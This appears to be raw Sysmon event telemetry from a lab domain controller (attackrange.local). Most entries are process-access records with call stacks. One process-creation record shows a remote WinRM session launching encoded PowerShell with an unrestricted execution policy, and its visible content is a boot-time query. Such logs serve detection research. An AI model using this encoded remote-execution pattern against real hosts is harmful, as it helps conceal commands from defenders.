10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-6442-6064-E702-00000000AD01}43244776C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-6442-6064-E602-00000000AD01}42082736C:\Windows\system32\WinrsHost.exe{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.948{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6442-6064-7EBF-120000000000}0x12bf7e0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.935{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.920{266CAFBE-62DD-6064-1400-00000000AD01}13401756C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.904{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-6442-6064-E702-00000000AD01}43244776C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E702-00000000AD01}4324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll